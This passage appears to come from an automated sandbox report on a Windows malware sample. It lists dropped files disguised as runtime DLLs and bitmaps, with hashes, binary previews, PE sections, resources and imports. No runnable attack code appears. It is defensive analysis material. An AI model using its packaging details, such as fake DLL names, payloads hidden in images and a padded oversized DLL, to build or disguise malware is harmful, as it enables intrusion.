                              • Antivirus: ReversingLabs, Detection: 0%
                              Joe Sandbox View:
                              • Filename: nOyswc9ly2.dll, Detection: malicious, Browse
                              • Filename: , Detection: malicious, Browse
                              Reputation:moderate, very likely benign file
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p.. 4.os4.os4.os..nr6.os=..s".os4.ns..osf.nr7.osf.kr?.osf.lr<.osf.jr..osf.or5.osf.s5.osf.mr5.osRich4.os........................PE..L...J(.`.........."!.........~...............0.......................................r....@A.........................T......<c..........................x#.......6...W..8............................W..@............`..8............................text...b........................... ..`.data...L(...0......................@....idata.......`.......2..............@..@.rsrc................J..............@..@.reloc...6.......8...N..............@..B........................................................................................................................................................................................................................................................................................................

                              C:\Program Files (x86)\90m3FHO\VCRUNTIME140.dll

                              Download File
                              Process:C:\Users\user\Desktop\Rudvfa0Z17.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):79792
                              Entropy (8bit):6.778797048504205
                              Encrypted:false
                              SSDEEP:1536:hExZIDobDaHrrAPsCbU4qzBHXpHolecbGpJGBNzZz3:yZPDaHrrobUHzDQecbGbGN
                              MD5:9D5A742F221C4929A178BAF2B93FC7FB
                              SHA1:928C9E0E1C18EC474C2F450CA00A154E44AC547A
                              SHA-256:F10727074BCB4375F276E48DA64029D370299768536157321FB4BD9B1997B898
                              SHA-512:F4614962C67BB41B8A2FB17E3112745F4BA012BBF382C1CC7DEACD6C8525A53D75890A2EB46F0DA61BFA054DC52505B09A29291D5FA1C25C6201A66B9DC4B547
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Joe Sandbox View:
                              • Filename: nOyswc9ly2.dll, Detection: malicious, Browse
                              Reputation:low
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........M...M...M.....O...D...F...M...d.../..Y.../..X.../..Q.../..L.../.u.L.../..L...RichM...........PE..L...19............"!.........................................................P............@A........................P........ .......0...................'...@......x$..T............................#..@............ ...............................text...d........................... ..`.data...............................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................

                              C:\Program Files (x86)\90m3FHO\libcef.dll

                              Download File
                              Process:C:\Users\user\Desktop\Rudvfa0Z17.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):524288000
                              Entropy (8bit):0.03653807951946192
                              Encrypted:false
                              SSDEEP:
                              MD5:D951A61C56A005A8415DC86758E08557
                              SHA1:A94BE1A3E166FCCADEC300885B0B923735DA7596
                              SHA-256:DCD188D383CB6347BFED0F4E6209ABD579526E729B003C31C3A8B117C1475AF6
                              SHA-512:D63B9887F945F6ABDAEA2FE297507AB9E1A84B10864C8AE454E8E3714C77C19131614FDD6DEAB85CA9950A6227D5559FF1002869FDCE63C9DFDDA7998BB22188
                              Malicious:true
                              Joe Sandbox View:
                              • Filename: nOyswc9ly2.dll, Detection: malicious, Browse
                              Reputation:low
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A..........4.......!..........)......9.......c.........1.....0.....7....Rich...........PE..L...5..f...........!.........0......$].......................................0............@.........................pI......t6.......0..X....................@..l...................................X(..@............................................text...!........................... ..`.rdata..Z...........................@..@.data.......p.......T..............@....rsrc...X....0......................@..@.reloc..V....@......................@..B........................................................................................................................................................................................................................................................................................................................

                              C:\Program Files (x86)\90m3FHO\t3d.tmp

                              Download File
                              Process:C:\Users\user\Desktop\Rudvfa0Z17.exe
                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                              Category:dropped
                              Size (bytes):6443425
                              Entropy (8bit):7.999970882342927
                              Encrypted:true
                              SSDEEP:98304:7c5bWQVHWXS1k+CxcfLg3LFvsI0i/2tEn+ynekhscRZ+Q3FqFoJSnerSgkogC6qz:7c5FNB7WRjsUZn5h/+e7Vkokqg8iEHCu
                              MD5:FB936CD4F33E5AE9AB88D7AE21B8D654
                              SHA1:157DF7F219BB272F2DC56B3AA0BD5CE70E4902DA
                              SHA-256:3C55279D70BBAAA18DCA653DD5922BEAE2F720B8285D6A195A21961DE005BCF2
                              SHA-512:F72254B4CE87CAAFA12DD2DDEEC7B77DABEE2FC052E3CA102E55C5ABCC7F99FD4EE6A8544F5942D2A75EDF66C406CB20A0978E9E378055B79EFFB820094AADC1
                              Malicious:false
                              Preview:PK........R..Y................text/UT....1.f.1.f.1.fPK..........7X........x.......text/MSVCP140.dllUT.....ej..f2M.f.z.0I\pq...7....N...y..A....L.:.v.FF.e}.F."..._.....hI.g....M_.....]..x..h.\....xh...=X....R. .....W2O#-.u..-sZ.%.ST..=.{...3W>...h./.(...nL..&.+~.^BY..<..:.T..k......jq.[...n.T..{h....../c..iAj..+..|..|.x\.:L.S...C.@r..M.u....`%..fJK].^.;$)...(.H.$...W1;c..9;fLF.....h..!=|.z..<.2..A ..<.=T.(.t-....j.K<.z>.Uu.....>a..".-,7.*\.Q.k...'#.....P....G.[H;*...}.h........}.i..x...!sVN.8....G.&_#...]J...._g]..G....,f.RJ...U/...w.d.........v.-........!.A=\\Un.....f....5c`7.[..t.:..J1.../HV.%..6I....I....B.e.j.".....>...($....|:.Wb..wAx.*......B.MX}b.p..k.05.5^%.w.C.... ua}.......*:..?u...!j[..0;!...Bi..d..i.F.2T..2.....m..gC.}.R....2.J...7.J$u)...#oo.DD...$..P.OTzy.D.F..S5.)i.*.*.....A\....]..t...P4..R..;O..._k.F..@..1......j.a.."..<...V.m....je...I*....lO.........|sl.".J..X..l8C..xqR."e.yt`.6.o8!.E...#.uA.S../..Vh...q...Q....*.4JN^...;Q..v

                              C:\Program Files (x86)\90m3FHO\t4d.tmp

                              Download File
                              Process:C:\Users\user\Desktop\Rudvfa0Z17.exe
                              File Type:PC bitmap, Windows 3.x format, 556 x 556 x 32, image size 1236544, cbSize 1236598, bits offset 54
                              Category:dropped
                              Size (bytes):1236598
                              Entropy (8bit):7.382377228331485
                              Encrypted:false
                              SSDEEP:24576:hXptT9TEpaNPwRTOMcEBe0rOZsdEjQGUeK+GKe66/uV:hZXFNoRk10aZsWjQeBGT
                              MD5:137CAFC945CE96E386ECBFBD8C915D46
                              SHA1:815BD011538F45CFA469C76861EBD5F7CC24AA79
                              SHA-256:12F9EDFB042B9D83AF6FA44F3DEE7A320A8D17F5951996B56563ABF3E527470B
                              SHA-512:5C377130ED4A2CA7FD8A1DCE5001D492E46D1947B6101658CC517366FDE75B0E8AA02168BA258BC35640AE0BB6915916854EC5DA1B4D58137B552C9BFFBB5027
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              Preview:BMv.......6...(...,...,..... .....@...................*R..d...c...........g...'...g...g...g...g...g...g...g...g.......i...g...F..L.)Th.{ p.ggr.e c.fno.(beGzunGan #GS .gdeI...C...g......A...........4........F..........).....9...................1......0......7....5ach...g...g...7M..+...R..fg...g......!l...g...g8..g...CU..g...g...g...g...g...b...g...b...g...g8..g...g...e.@.g...g...g...g...g...w....A.......>......g8..?...g...g...g...g...gH......g...g...g...g...g...g...g...g...? ..'...g...g...g.......g...g...g...g...g...g...I|ex....F...g...g...g...g...g...g...G..`Izda.i..=...g...g...g...g...g...g...'..@Ilat........gx..g...g\..g...g...g...'...Izsr....?...g8..g...g...g...g...g...'..@Izel.k..1...gH..g...g...g...g...g...'..Bg...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g.

                              C:\Program Files (x86)\90m3FHO\t5d.tmp

                              Download File
                              Process:C:\Users\user\Desktop\Rudvfa0Z17.exe
                              File Type:PC bitmap, Windows 3.x format, 378 x 377 x 32, image size 570024, cbSize 570078, bits offset 54
                              Category:dropped
                              Size (bytes):569918
                              Entropy (8bit):7.22606385832403
                              Encrypted:false
                              SSDEEP:12288:Msj4UEF0Jo9ihYDdKa+yKGBaCMLT2ftNQ:L8Eo9dhKwnBfMLTqNQ
                              MD5:F2FA7879FAA4B732675FF265D3DA6FC0
                              SHA1:B9A5074F0D86EFA0CDACB4214C1FE66A41B8525E
                              SHA-256:8C7506B772BBFD534F20280AF36564FB4AE95C8708A2F95D471ED607CCF65272
                              SHA-512:5020D0403FE3D30570843CC8B08B76E7B3FBAA3A706293125DFDC6C60EE42536F90B753F2536068C87F850D96B14A9030392144B0561966B7A223055D38908C1
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              Preview:BM.......6...(...z...y..... .............................gPU.............o.h.g..hc...5`.t.QP.b..........f..S2^Wj.Pje...$....T.Xj.Qjn<blZ.;f..,..g.f..,..g.XjUn..C...gPj....$....?bdf.$.g..X.$.g....,4..,..g...C...g..$.....$.g....,..g.f..,..g.f..,..g.f..,..g.f..,..g.f..,..g.f..,..g..DC4S.3,=f.L$>.m.DCHpf.L$P+g.DCZa.#,Sf.L$T+a.DC^b.+,W.#,Xa.D$Y..D$=qAf.L$D1a.LCNf.#,Gt..D$.i.TCB.DCCA.3,L.3,Mf.L$N.kf.#,\V..L$9n.DCWtu.L$a..T$..D$.X.LCl.DCmot.k.DCat..,..g.F..,..g..C...g}sh...$......$.....|..C...g.$.....kti..$.g..o.mY..,..g..LCe.LC|.LCq..C...g......C...g.$....$ich.L$l .D$.|Na.n.DCziv.L$u4qst..D$.eI.;,|f.L$}.gf..,..g.Rt.$.g....,..g.A..,..g...C...gn.C...gNu..,..g..C...gkti...$......$....3i.C...gj..C...g.w.g...&.^...k.g....$.g..j...$....?n..C...gn..C...g.D${X..C...g.\$SXUU..j.8.D$#n.|C..DC..DC<PU.L$...|$yX.tC ....Xf.L$...D$q.D$;.D$...$....7].DC.P..,(..b.X..D$sn.DC...C...g.D$...$....7].DC.P..,(..b.^.L$l..t$s.D$...$....7].DC.f..,.P.|$(..j.?n.DC.f.#,..#,<.#,...,..g.PU.L$.7.t$O...,..g.

                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\long[1].bmp

                              Download File
                              Process:C:\Users\user\Desktop\Rudvfa0Z17.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):139784
                              Entropy (8bit):6.883954420272221
                              Encrypted:false
                              SSDEEP:1536:lqOmEtRGptJAq+NKUmALI1C381ngfvMfqaJYn2KCkH0g9bbQWplEjyHWpdyxk9nG:lIhI+xr1ngfv4KVUeQWlfHWpoy80lKX
                              MD5:98C50817D295EEAC3C2968A656B79ADD
                              SHA1:0401B3CC5586255FFDD849B5C6E1A5124C7090E0
                              SHA-256:A8731026677A88F696A64FDC113BB33C5B94B059313A447F95A4459E281ED53B
                              SHA-512:354DBB5E89D1C18CBDD3C4D81FAB733B4B3259A12DA5BDD929E46B1ADD2954B8C9DEA832075E7C8D879641B1895BC597D27634B4E0DE937808CD32ECC624239E
                              Malicious:false
                              Preview:.l..l4U......g....!nlh.ll.hhl..>....P.il........ml.S9:Wj.4je..$.l.._.Xj.5jn7.lZ._f..H..llf..H..llXj^...H...l4j...$.l..4.df..$.ll.X..$.ll...H4..H..ll..H...l.$.l....$.ll...H..llf..H..llf..H..llf..H..llf..H..llf..H..llf..H..ll.DHPS.8H=f.($>...DH,pf.($P ..DH>a.(HSf.($T ..DH:b. HW.(HXa. $Y..D$6.Af.($D:..LH*f.(HGt..D$%..TH&.DH'A.8HL.8HMf.($N..f.(H\V..L$2..DH3tu.($a..T$..D$.<.LH..DH.ot...DH.t..H..llF..H..ll.H...l.sh%.$.l.....$.l......H...l..$.l....ti..$.ll.o..Y..H..ll.LH..LH..LH...H...l......H...l..$.l../.ch.($l+.D$..Na...DH.iv.($u?.st..D$..I.0H|f.($}..f..H..llRt..$.ll...H..llA..H..ll..H...l..H...l*u..H..ll.H...l.ti..$.l.....$.l..8..H...l...H...l.w.ll..-.^...k.ll....$.ll.jt.$.l..4...H...l...H...l.D$p<..H...l.\$X<UU..j.3.D$(..|Hx.DHt.DHXPU.($...|$r<.tHD...bXf.($...D$z.D$0.D$t.$.l..<9.DHpP..H(....X..D$x..DHz..H...l.D$t.$.l..<9.DHpP..H(....^.($l..t$x.D$t.$.l..<9.DHpf..H.P..$(..j.4..DHxf.(H..(H<.(H...H..llPU.($.<.t$D...H..llf..H..(H...H..llPU.($...t$r<.tHD...($P..|$x.D$t.$.l..

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):6.622337142177745
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 98.39%
                              • Windows ActiveX control (116523/4) 1.15%
                              • InstallShield setup (43055/19) 0.42%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              File name:Rudvfa0Z17.exe
                              File size:3'656'704 bytes
                              MD5:bed10af8b143ee5b48c221be89786600
                              SHA1:69ab3c83dd7f2f54d7d08c46a7c900b00981c968
                              SHA256:44d3fbf225fc3e6ae2bf8b68f3dd69fc180d29e2b69ff8f53c83ce78c07845ce
                              SHA512:0057afad2190a16dfd464927aea07bc1187181e55f4627298278516a3a3246832f234068598f46e8a7d35292647af3b00b23aaa775406c662ae65e12b720db2d
                              SSDEEP:98304:x/QjJmzcVnj6Ov4xDSLrMcXCKKoRpv06CECrq4zFe2uiBzx:xQxvpXgIIECrq4z7zx
                              TLSH:7806B012BBC1C076E5533631916BA37E967DD6330B3592C396A42E395E301D2AA3D38F
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&/RCbN<.bN<.bN<.k6..cN<.k6..qN<.....eN<.y...SN<.y....O<.bN=..M<.k6..IN<.y....M<.y...wN<.E...cN<.y...cN<.RichbN<................

                              File Icon

                              Icon Hash:f2d3d1d3b3f3d305

                              Static PE Info

                              General

                              Entrypoint:0x6388e6
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:
                              Time Stamp:0x618BA2AE [Wed Nov 10 10:45:02 2021 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:974b68147a5b729a587369f0f61bfd7a

                              Entrypoint Preview

                              Instruction
                              call 00007FC854F86C22h
                              jmp 00007FC854F7939Eh
                              cmp ecx, dword ptr [007330B0h]
                              jne 00007FC854F79514h
                              rep ret
                              jmp 00007FC854F86CA9h
                              mov edi, edi
                              push ebp
                              mov ebp, esp
                              mov eax, ecx
                              mov ecx, dword ptr [ebp+08h]
                              mov dword ptr [eax], 006F7058h
                              mov ecx, dword ptr [ecx]
                              mov dword ptr [eax+04h], ecx
                              mov byte ptr [eax+08h], 00000000h
                              pop ebp
                              retn 0008h
                              mov eax, dword ptr [ecx+04h]
                              test eax, eax
                              jne 00007FC854F79517h
                              mov eax, 006F7060h
                              ret
                              mov edi, edi
                              push ebp
                              mov ebp, esp
                              cmp dword ptr [ebp+08h], 00000000h
                              push edi
                              mov edi, ecx
                              je 00007FC854F7953Fh
                              push esi
                              push dword ptr [ebp+08h]
                              call 00007FC854F821B5h
                              lea esi, dword ptr [eax+01h]
                              push esi
                              call 00007FC854F7AEA3h
                              pop ecx
                              pop ecx
                              mov dword ptr [edi+04h], eax
                              test eax, eax
                              je 00007FC854F79523h
                              push dword ptr [ebp+08h]
                              push esi
                              push eax
                              call 00007FC854F86D52h
                              add esp, 0Ch
                              mov byte ptr [edi+08h], 00000001h
                              pop esi
                              pop edi
                              pop ebp
                              retn 0004h
                              mov edi, edi
                              push esi
                              mov esi, ecx
                              cmp byte ptr [esi+08h], 00000000h
                              je 00007FC854F7951Bh
                              push dword ptr [esi+04h]
                              call 00007FC854F799CAh
                              pop ecx
                              and dword ptr [esi+04h], 00000000h
                              mov byte ptr [esi+08h], 00000000h
                              pop esi
                              ret
                              mov edi, edi
                              push ebp
                              mov ebp, esp
                              mov eax, dword ptr [ebp+08h]
                              push esi
                              mov esi, ecx
                              and dword ptr [esi+04h], 00000000h
                              mov dword ptr [esi], 006F7058h
                              mov byte ptr [esi+08h], 00000000h
                              push dword ptr [eax]
                              call 00007FC854F79497h
                              mov eax, esi
                              pop esi
                              pop ebp
                              retn 0004h

                              Rich Headers

                              Programming Language:
                              • [C++] VS2008 SP1 build 30729
                              • [ C ] VS2008 SP1 build 30729
                              • [ASM] VS2010 SP1 build 40219
                              • [C++] VS2010 SP1 build 40219
                              • [IMP] VS2008 SP1 build 30729
                              • [ C ] VS2010 SP1 build 40219
                              • [LNK] VS2010 SP1 build 40219

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x31fb9c0x1b8.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x3410000xaa44.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x34c0000x2c8d4.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x284fe00x1c.rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3015280x40.rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x2840000xbdc.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x2820a20x282200a6dff50aaebb36d2041132888d3004fbunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0x2840000x9fa020x9fc00442a0c929db0624d257be64f33b72a07False0.36007036140453835data5.64738857990474IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0x3240000x1c24c0x11a00d35d40b93758c0e3b2e6b3ac2f5f260aFalse0.390874335106383data5.348760131046066IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0x3410000xb0000xac002dc3de242e4b5797c6a1bd0bd0dc65b4False0.30193949854651164data4.641268087531589IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x34c0000x3e20a0x3e40081ed51bb4e26407ded2394fc2f1c2016False0.34334211847389556data5.439303048507579IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_CURSOR0x341e500x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"ChineseChina0.4805194805194805
                              RT_CURSOR0x341f840xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"ChineseChina0.7
                              RT_CURSOR0x3420380x134AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdChineseChina0.36363636363636365
                              RT_CURSOR0x34216c0x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"ChineseChina0.35714285714285715
                              RT_CURSOR0x3422a00x134dataChineseChina0.37337662337662336
                              RT_CURSOR0x3423d40x134dataChineseChina0.37662337662337664
                              RT_CURSOR0x3425080x134Targa image data 64 x 65536 x 1 +32 "\001"ChineseChina0.36688311688311687
                              RT_CURSOR0x34263c0x134Targa image data 64 x 65536 x 1 +32 "\001"ChineseChina0.37662337662337664
                              RT_CURSOR0x3427700x134Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"ChineseChina0.36688311688311687
                              RT_CURSOR0x3428a40x134Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"ChineseChina0.38636363636363635
                              RT_CURSOR0x3429d80x134dataChineseChina0.44155844155844154
                              RT_CURSOR0x342b0c0x134dataChineseChina0.4155844155844156
                              RT_CURSOR0x342c400x134AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdChineseChina0.5422077922077922
                              RT_CURSOR0x342d740x134dataChineseChina0.2662337662337662
                              RT_CURSOR0x342ea80x134dataChineseChina0.2824675324675325
                              RT_CURSOR0x342fdc0x134dataChineseChina0.3246753246753247
                              RT_BITMAP0x3431100xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80ChineseChina0.44565217391304346
                              RT_BITMAP0x3431c80x144Device independent bitmap graphic, 33 x 11 x 4, image size 220ChineseChina0.37962962962962965
                              RT_ICON0x34330c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192ChineseChina0.4222972972972973
                              RT_ICON0x3434340x568Device independent bitmap graphic, 16 x 32 x 8, image size 320ChineseChina0.45303468208092484
                              RT_ICON0x34399c0x368Device independent bitmap graphic, 16 x 32 x 24, image size 832ChineseChina0.6444954128440367
                              RT_ICON0x343d040x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640ChineseChina0.2110215053763441
                              RT_ICON0x343fec0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152ChineseChina0.5505415162454874
                              RT_ICON0x3448940xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688ChineseChina0.4450959488272921
                              RT_ICON0x34573c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088ChineseChina0.5691489361702128
                              RT_ICON0x345ba40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224ChineseChina0.3428705440900563
                              RT_ICON0x346c4c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600ChineseChina0.24626556016597512
                              RT_DIALOG0x3491f40x124dataChineseChina0.6883561643835616
                              RT_DIALOG0x3493180x44dataChineseChina0.9558823529411765
                              RT_DIALOG0x34935c0x110dataChineseChina0.45588235294117646
                              RT_DIALOG0x34946c0x8cdataChineseChina0.7
                              RT_DIALOG0x3494f80x44dataChineseChina0.7941176470588235
                              RT_DIALOG0x34953c0x94dataChineseChina0.7432432432432432
                              RT_DIALOG0x3495d00x44dataChineseChina0.8676470588235294
                              RT_DIALOG0x3496140x44dataChineseChina0.8529411764705882
                              RT_DIALOG0x3496580x11adataChineseChina0.6985815602836879
                              RT_DIALOG0x3497740xe8dataChineseChina0.6336206896551724
                              RT_DIALOG0x34985c0x34dataChineseChina0.9038461538461539
                              RT_STRING0x3498900x46dataChineseChina0.7
                              RT_STRING0x3498d80x82StarOffice Gallery theme p, 536899072 objects, 1st nChineseChina0.7153846153846154
                              RT_STRING0x34995c0x2adataChineseChina0.5476190476190477
                              RT_STRING0x3499880x184dataChineseChina0.48711340206185566
                              RT_STRING0x349b0c0x4e6dataChineseChina0.37719298245614036
                              RT_STRING0x349ff40x264dataChineseChina0.3333333333333333
                              RT_STRING0x34a2580x2dadataChineseChina0.3698630136986301
                              RT_STRING0x34a5340x8adataChineseChina0.6594202898550725
                              RT_STRING0x34a5c00xacdataChineseChina0.45348837209302323
                              RT_STRING0x34a66c0xdedataChineseChina0.536036036036036
                              RT_STRING0x34a74c0x4a8dataChineseChina0.3221476510067114
                              RT_STRING0x34abf40x228dataChineseChina0.4003623188405797
                              RT_STRING0x34ae1c0x2cdataChineseChina0.5227272727272727
                              RT_STRING0x34ae480x53cdataChineseChina0.2947761194029851
                              RT_GROUP_CURSOR0x34b3840x22Lotus unknown worksheet or configuration, revision 0x2ChineseChina1.0294117647058822
                              RT_GROUP_CURSOR0x34b3a80x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_CURSOR0x34b3bc0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_CURSOR0x34b3d00x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_CURSOR0x34b3e40x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_CURSOR0x34b3f80x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_CURSOR0x34b40c0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_CURSOR0x34b4200x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_CURSOR0x34b4340x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_CURSOR0x34b4480x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_CURSOR0x34b45c0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_CURSOR0x34b4700x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_CURSOR0x34b4840x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_CURSOR0x34b4980x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_CURSOR0x34b4ac0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                              RT_GROUP_ICON0x34b4c00x84dataChineseChina0.6439393939393939
                              RT_VERSION0x34b5440x2a4dataChineseChina0.5281065088757396
                              RT_HTML0x34b7e80xfHTML document, ASCII text, with no line terminatorsChineseChina1.5333333333333334
                              RT_MANIFEST0x34b7f80x249XML 1.0 document, ASCII textEnglishUnited States0.576068376068376

                              Imports

                              DLLImport
                              WS2_32.dllfreeaddrinfo, htons, inet_addr, socket, bind, WSAGetLastError, WSAAsyncSelect, listen, accept, inet_ntoa, recv, send, WSACleanup, closesocket, WSASetLastError, __WSAFDIsSet, select, WSAIoctl, setsockopt, getsockname, ntohs, getsockopt, getpeername, connect, WSAStartup, getaddrinfo, sendto, recvfrom, ioctlsocket, gethostname, shutdown, htonl, getservbyname, gethostbyname
                              WLDAP32.dll
                              CRYPT32.dllCertCloseStore, CertEnumCertificatesInStore, CertFindCertificateInStore, CertOpenStore, CertGetCertificateContextProperty, CertFreeCertificateContext, CertDuplicateCertificateContext
                              KERNEL32.dllGetTempFileNameW, GetTempPathW, GetWindowsDirectoryW, GetNumberFormatW, GetFileAttributesW, GetProfileIntW, SearchPathW, SetErrorMode, GetFileAttributesExW, SetEndOfFile, FileTimeToLocalFileTime, GetFileSizeEx, GetFileTime, VirtualProtect, GetUserDefaultLCID, FindResourceExW, HeapSetInformation, GetStartupInfoW, HeapFree, GetCPInfo, CreateDirectoryW, EncodePointer, DecodePointer, GetSystemTimeAsFileTime, HeapAlloc, HeapReAlloc, ExitThread, CreateThread, ExitProcess, VirtualAlloc, GetSystemInfo, VirtualQuery, GetDriveTypeA, FindFirstFileExA, GetFileInformationByHandle, GetFileAttributesA, CreateFileA, SetConsoleCtrlHandler, ReadConsoleInputA, SetConsoleMode, GetConsoleMode, RtlUnwind, HeapQueryInformation, HeapSize, SetStdHandle, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, HeapCreate, TerminateProcess, UnhandledExceptionFilter, IsDebuggerPresent, IsProcessorFeaturePresent, LCMapStringW, GetStringTypeW, GetTimeZoneInformation, GetConsoleCP, GetOEMCP, IsValidCodePage, GetFullPathNameA, GetProcessHeap, WriteConsoleW, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, GetDriveTypeW, SetEnvironmentVariableA, UnlockFile, LockFile, SetFilePointer, lstrcmpiW, DeleteFileW, GetCurrentDirectoryW, GlobalFlags, GetSystemDirectoryW, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, GlobalHandle, GlobalReAlloc, TlsGetValue, LocalAlloc, InterlockedIncrement, FileTimeToSystemTime, GetThreadLocale, GlobalGetAtomNameW, RaiseException, WritePrivateProfileStringW, GetFullPathNameW, ResumeThread, SetThreadPriority, InterlockedDecrement, ReleaseActCtx, CreateActCtxW, lstrcmpA, GetUserDefaultUILanguage, ConvertDefaultLocale, GetSystemDefaultUILanguage, GetLocaleInfoW, LoadLibraryExW, GlobalAddAtomW, GlobalFindAtomW, GlobalDeleteAtom, GetVersionExW, GetModuleHandleW, CompareStringW, InitializeCriticalSectionAndSpinCount, lstrcmpW, ActivateActCtx, DeactivateActCtx, CopyFileW, GlobalSize, FormatMessageW, LocalFree, MulDiv, GetSystemTime, SystemTimeToFileTime, GlobalMemoryStatus, FindClose, GetVersion, FlushConsoleInputBuffer, FormatMessageA, SetLastError, GetStdHandle, GetFileType, WaitForMultipleObjects, PeekNamedPipe, ReadFile, ExpandEnvironmentStringsA, QueryPerformanceCounter, GetTickCount, SleepEx, QueryPerformanceFrequency, GetModuleHandleA, LoadLibraryA, GetSystemDirectoryA, VerSetConditionMask, VerifyVersionInfoA, OpenProcess, Process32NextW, Process32FirstW, CreateToolhelp32Snapshot, OutputDebugStringA, OutputDebugStringW, GetFileSize, 